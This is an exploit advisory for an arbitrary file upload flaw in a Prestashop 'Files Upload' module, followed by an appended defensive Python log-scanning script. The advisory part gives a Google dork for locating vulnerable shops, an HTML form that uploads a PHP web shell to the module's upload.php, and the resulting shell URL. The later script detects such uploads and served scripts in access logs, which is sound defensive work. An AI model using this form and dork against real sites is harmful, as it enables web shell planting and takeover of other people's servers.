Unknown On 15/08/16

# Exploit Title: Prestashop Customers Filesupload Arbitrary File Upload
# Google Dork: inurl:/module/filesupload/
# Date: 15/08/2016
# Software Link: http://addons.prestashop.com/en/4270-files-upload.html
# Version: Any Version
# Tested on: Windows
# Author : AnoaGhost

Exploit CSRF :

<form method="post" action="http://site.com/path/" enctype="multipart/form-data">
<input type="file" name="file"/>
<input type="hidden" name="name" value="nameshell in here.php" />
<input type="submit" />
</form>


PoC :
http://site.com/path/modulefilesupload/upload.php


Shell Path :
http://site.com/path/modulefilesupload/uploads/nameshell in here.php
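
A defender-side check, added here as an example and not part of the original advisory: it scans web server access logs for POSTs to the upload endpoint and for requests to script files under the uploads directory. The log format (Common/Combined), the extension list, the function name and the sample log lines are assumptions made for this example; the two paths are taken as written above.

```python
import re
from urllib.parse import unquote, urlsplit

# Paths exactly as written in the advisory; adjust to the shop's real layout.
UPLOAD_ENDPOINT = "modulefilesupload/upload.php"
UPLOAD_DIR = "modulefilesupload/uploads/"
# Extensions a PHP-enabled server may execute (assumed list; match your handler config).
SCRIPT_EXT = re.compile(r"\.(?:php\d?|phtml|phar)(?:/|$)", re.I)
# Common/Combined Log Format: ip ident user [time] "METHOD uri PROTO" status size
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (.+?) HTTP/[\d.]+" (\d{3}) ')

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [15/Aug/2016:10:00:01 +0000] "POST /shop/modulefilesupload/upload.php HTTP/1.1" 200 12
203.0.113.7 - - [15/Aug/2016:10:00:09 +0000] "GET /shop/modulefilesupload/uploads/a%20b.php HTTP/1.1" 200 512
198.51.100.4 - - [15/Aug/2016:10:02:00 +0000] "GET /shop/modulefilesupload/uploads/invoice.pdf HTTP/1.1" 200 9000
198.51.100.9 - - [15/Aug/2016:10:03:00 +0000] "GET /shop/modulefilesupload/uploads/x.phtml HTTP/1.1" 404 0
"""

def find_upload_abuse(lines):
    """Return (kind, ip, path, status, ip_posted_upload) tuples for POSTs to the
    upload endpoint and for requests to script files under the uploads directory."""
    findings, uploaders = [], set()
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # not an access-log line we understand
        ip, method, uri, status = m.groups()
        # Decode %20 etc. so encoded file names are compared in plain form.
        path = unquote(urlsplit(uri).path)
        if method == "POST" and path.endswith(UPLOAD_ENDPOINT):
            kind = "upload_post"
            uploaders.add(ip)
        elif UPLOAD_DIR in path and SCRIPT_EXT.search(path):
            # 200 means a script exists in a directory meant for customer files.
            kind = "script_served" if status == "200" else "script_probe"
        else:
            continue
        findings.append((kind, ip, path, int(status), ip in uploaders))
    return findings

if __name__ == "__main__":
    for finding in find_upload_abuse(SAMPLE_LOG.splitlines()):
        print(finding)
```

A `script_served` finding means a script file is present in the uploads directory and warrants inspecting that directory on disk.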
